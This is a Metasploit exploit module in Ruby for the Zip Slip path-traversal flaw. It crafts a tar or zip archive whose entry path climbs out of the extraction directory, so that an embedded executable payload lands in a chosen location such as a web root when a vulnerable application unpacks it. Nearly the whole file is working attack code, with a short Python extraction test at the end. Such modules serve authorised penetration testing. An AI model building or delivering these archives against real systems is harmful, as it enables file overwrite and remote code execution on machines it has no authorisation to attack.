1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'rex/zip'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = ManualRanking
10

11
  include Msf::Exploit::FILEFORMAT
12
  include Msf::Exploit::EXE
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Generic Zip Slip Traversal Vulnerability',
19
        'Description' => %q{
20
          This is a generic arbitrary file overwrite technique, which typically results in remote
21
          command execution. This targets a simple yet widespread vulnerability that has been
22
          seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc.
23
          The idea is that often archive extraction libraries have no mitigations against
24
          directory traversal attacks. If an application uses it, there is a risk when opening an
25
          archive that is maliciously modified, and result in the embedded payload to be written
26
          to an arbitrary location (such as a web root), and result in remote code execution.
27
        },
28
        'License' => MSF_LICENSE,
29
        'Author' => [
30
          'Snyk', # Technique discovery
31
          'sinn3r', # Metasploit
32
          'ggkitsas'
33
        ],
34
        'References' => [
35
          ['URL', 'https://snyk.io/research/zip-slip-vulnerability']
36
        ],
37
        'DefaultOptions' => {
38
          'EXITFUNC' => 'thread',
39
          'DisablePayloadHandler' => true
40
        },
41
        'Platform' => ['linux', 'win', 'unix'],
42
        'Targets' => [
43
          ['Manually determined', {}]
44
        ],
45
        'Privileged' => false,
46
        'DisclosureDate' => '2018-06-05',
47
        'Notes' => {
48
          'Reliability' => UNKNOWN_RELIABILITY,
49
          'Stability' => UNKNOWN_STABILITY,
50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
        }
52
      )
53
    )
54

55
    register_options([
56
      OptString.new('FILENAME', [true, 'The name of the archive file', 'msf.tar']),
57
      OptEnum.new('FTYPE', [true, 'The archive type', 'tar', ['tar', 'zip'] ]),
58
      OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])
59
    ])
60
  end
61

62
  class ZipSlipArchive
63
    attr_reader :data
64
    attr_reader :fname
65
    attr_reader :payload
66
    attr_reader :type
67

68
    def initialize(n, p, t)
69
      @fname = n
70
      @payload = p
71
      @type = t
72
      @data = make
73
    end
74

75
    def make
76
      data = ''
77
      path = Rex::FileUtils.normalize_unix_path(fname)
78

79
      if type == 'tar'
80
        contents = StringIO.new
81
        Rex::Tar::Writer.new(contents) do |t|
82
          t.add_file(path, 0o777) do |f|
83
            f.write(payload)
84
          end
85
        end
86
        contents.seek(0)
87
        data = contents.read
88
        contents.close
89
        data
90
      elsif type == 'zip'
91
        zip = Rex::Zip::Archive.new
92
        zip.add_file(path, payload)
93
        data = zip.pack
94
      end
95
    end
96
  end
97

98
  def make_archive(target_payload_path, type)
99
    elf = generate_payload_exe(code: payload.encoded)
100
    archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe, type)
101
    archive.make
102
  end
103

104
  def exploit
105
    target_payload_path = datastore['TARGETPAYLOADPATH']
106
    unless target_payload_path.match(%r{\.\./})
107
      print_error('Please set a traversal path')
108
      return
109
    end
110

111
    archive = make_archive(target_payload_path, datastore['FTYPE'])
112
    file_create(archive)
113
    print_status('When extracted, the payload is expected to extract to:')
114
    print_status(target_payload_path)
115
  end
116
end
117

118
# A quick test:
119
#
120
# $ python
121
# >>> import tarfile
122
# >>> t = tarfile.open('test.tar')
123
# >>> t.extractall()
124
# >>> exit()
125
#
126

127